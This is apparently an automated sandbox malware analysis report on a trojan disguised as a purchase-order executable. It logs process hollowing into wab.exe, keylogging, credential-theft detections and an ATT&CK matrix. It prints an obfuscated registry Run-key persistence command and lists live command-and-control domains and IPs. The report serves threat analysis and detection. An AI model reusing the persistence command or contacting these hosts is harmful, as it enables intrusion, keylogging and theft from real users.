              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "insecta" /t reg_expand_sz /d "%fumigatorium% -windowstyle minimized $hysterogenic=(get-itemproperty -path 'hkcu:\stafetlbenes\').indsbedes;%fumigatorium% ($hysterogenic)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "insecta" /t reg_expand_sz /d "%fumigatorium% -windowstyle minimized $hysterogenic=(get-itemproperty -path 'hkcu:\stafetlbenes\').indsbedes;%fumigatorium% ($hysterogenic)"Jump to behavior
              Source: wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerN
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerN=8f08
              Source: wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerX
              Source: wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7188, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7188, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              3
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Shared Modules
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              1
              Obfuscated Files or Information
              LSASS Memory14
              System Information Discovery
              Remote Desktop Protocol11
              Input Capture
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Command and Scripting Interpreter
              Logon Script (Windows)212
              Process Injection
              1
              Software Packing
              Security Account Manager11
              Security Software Discovery
              SMB/Windows Admin Shares1
              Clipboard Data
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets31
              Virtualization/Sandbox Evasion
              SSHKeylogging213
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435466 Sample: PO-USC-22USC-KonchoCo.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 45 leirfo45ozj01.duckdns.org 2->45 47 learfo55ozj02.duckdns.org 2->47 49 2 other IPs or domains 2->49 57 Snort IDS alert for network traffic 2->57 59 Found malware configuration 2->59 61 Antivirus detection for URL or domain 2->61 65 7 other signatures 2->65 10 PO-USC-22USC-KonchoCo.exe 31 2->10         started        signatures3 63 Uses dynamic DNS services 47->63 process4 file5 41 C:\Users\user\AppData\...\Amphioxidae.Zin, ASCII 10->41 dropped 71 Suspicious powershell command line found 10->71 14 powershell.exe 20 10->14         started        signatures6 process7 file8 43 C:\Users\user\...\PO-USC-22USC-KonchoCo.exe, PE32 14->43 dropped 73 Obfuscated command line found 14->73 75 Writes to foreign memory regions 14->75 77 Found suspicious powershell code related to unpacking or dynamic code loading 14->77 79 Powershell drops PE file 14->79 18 wab.exe 5 16 14->18         started        23 conhost.exe 14->23         started        25 cmd.exe 1 14->25         started        signatures9 process10 dnsIp11 51 learfo55ozj02.duckdns.org 193.222.96.21, 29871, 49740, 49742 SWISSCOMSwisscomSwitzerlandLtdCH Germany 18->51 53 enelltd.top 104.21.45.139, 443, 49739 CLOUDFLARENETUS United States 18->53 55 geoplugin.net 178.237.33.50, 49741, 80 ATOM86-ASATOM86NL Netherlands 18->55 39 C:\Users\user\AppData\Roaming\fvberms.dat, data 18->39 dropped 67 Sample uses process hollowing technique 18->67 69 Installs a global keyboard hook 18->69 27 cmd.exe 1 18->27         started        29 wab.exe 18->29         started        31 wab.exe 18->31         started        33 31 other processes 18->33 file12 signatures13 process14 process15 35 conhost.exe 27->35         started        37 reg.exe 1 1 27->37         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              PO-USC-22USC-KonchoCo.exe16%ReversingLabs
              PO-USC-22USC-KonchoCo.exe11%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe16%ReversingLabs
              C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe11%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              learfo55ozj02.duckdns.org1%VirustotalBrowse
              enelltd.top1%VirustotalBrowse
              geoplugin.net4%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://geoplugin.net/json.gp100%URL Reputationphishing
              http://geoplugin.net/json.gp100%URL Reputationphishing
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://contoso.com/0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gpD0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpg0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpq0%Avira URL Cloudsafe
              learfo55ozj02.duckdns.org0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp:0%Avira URL Cloudsafe
              learfo55ozj02.duckdns.org1%VirustotalBrowse
              http://geoplugin.net/json.gp:0%VirustotalBrowse
              http://geoplugin.net/json.gpq0%VirustotalBrowse
              http://geoplugin.net/json.gpg0%VirustotalBrowse
              http://geoplugin.net/json.gpD0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              learfo55ozj02.duckdns.org
              193.222.96.21
              truetrueunknown
              enelltd.top
              104.21.45.139
              truefalseunknown
              geoplugin.net
              178.237.33.50
              truefalseunknown
              leirfo45ozj01.duckdns.org
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gptrue
                • URL Reputation: phishing
                • URL Reputation: phishing
                unknown
                learfo55ozj02.duckdns.orgtrue
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpDwab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://geoplugin.net/json.gpdwab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://geoplugin.net/json.gpgwab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.3483439341.0000000004881000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3487057946.0000000006F3B000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://geoplugin.net/json.gpqwab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://nsis.sf.net/NSIS_ErrorErrorPO-USC-22USC-KonchoCo.exe, 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO-USC-22USC-KonchoCo.exe, 00000000.00000000.1615338710.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.3483439341.0000000004881000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://geoplugin.net/json.gp:wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                178.237.33.50
                                geoplugin.netNetherlands
                                8455ATOM86-ASATOM86NLfalse
                                104.21.45.139
                                enelltd.topUnited States
                                13335CLOUDFLARENETUSfalse
                                193.222.96.21
                                learfo55ozj02.duckdns.orgGermany
                                3303SWISSCOMSwisscomSwitzerlandLtdCHtrue
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1435466
                                Start date and time:2024-05-02 18:58:04 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 32s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:46
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:PO-USC-22USC-KonchoCo.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@1127/14@8/3
                                EGA Information:
                                • Successful, ratio: 66.7%
                                HCA Information:
                                • Successful, ratio: 93%
                                • Number of executed functions: 95
                                • Number of non-executed functions: 43
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 7764 because it is empty
                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                TimeTypeDescription
                                18:01:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Insecta %Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)
                                18:01:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Insecta %Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)
                                18:58:54API Interceptor28x Sleep call for process: powershell.exe modified
                                19:02:34API Interceptor63x Sleep call for process: wab.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                178.237.33.50REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                • geoplugin.net/json.gp
                                INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                • geoplugin.net/json.gp
                                Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                • geoplugin.net/json.gp
                                GVV.exeGet hashmaliciousRemcosBrowse
                                • geoplugin.net/json.gp
                                INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                • geoplugin.net/json.gp
                                Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                • geoplugin.net/json.gp
                                202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                • geoplugin.net/json.gp
                                PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                • geoplugin.net/json.gp
                                nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                • geoplugin.net/json.gp
                                Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                • geoplugin.net/json.gp
                                104.21.45.139NewCPhong.exeGet hashmaliciousUnknownBrowse
                                  193.222.96.21Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    .04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                      z39103_PN-EN-1090-1_A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                        z6FORMATOPROVEEDORESMETAX.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          z77EU17439-FT-MILKYLUXGOUDAMILD.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            sample.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              Copy of Noyan Order Form Global Importing Group 2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                  107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      learfo55ozj02.duckdns.orgEvgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      geoplugin.netREVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 178.237.33.50
                                                      INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      GVV.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
